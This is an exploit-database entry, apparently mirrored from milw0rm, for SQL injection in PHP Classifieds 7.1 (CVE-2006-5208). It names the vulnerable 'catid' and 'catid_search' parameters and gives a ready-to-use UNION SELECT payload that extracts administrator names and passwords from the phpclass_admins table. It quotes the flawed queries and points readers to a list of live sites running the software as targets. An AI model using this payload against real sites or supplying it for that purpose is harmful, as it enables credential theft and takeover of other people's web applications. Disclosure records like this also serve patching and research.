[] NeoSense
E X P L O I T S
title author type platform port cve id

PHP Classifieds 7.1 - 'index.php' SQL Injection

Author: Kzar
type: webapps
platform: php
port: 
date_added: 2006-10-04 
date_updated:  
verified: 1 
codes: OSVDB-29563;CVE-2006-5208;OSVDB-29562 
tags: 
aliases:  
screenshot_url:  
application_url: 
----
Credit: Kzar kzar@kzar.co.uk
kzar.co.uk/exploits/phpclassifieds_exploit
----
App Name: PHP Classifieds => 7.1
App URL: www.deltascripts.com/phpclassifieds
Problem: Multiple SQL Injection exploits
----
Exploit: search.php?catid_search=[sql]
        index.php?catid=[sql]
----
Example: Puts Username and Password in the title and on the page
index.php?catid=0 UNION SELECT concat(adm_name, space(1), adm_pass) AS adm_name, NULL FROM phpclass_admins
----
Context: These are the vulnerable queries
select cat_tpl from $cat_tbl where cat_id = ".$_REQUEST["catid_search"]
select cat_name,cat_tpl from $cat_tbl where cat_id = $catid
----
Google: Just go to http://www.deltascripts.com/phpclassifieds/livesites/
----

# milw0rm.com [2006-10-05]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.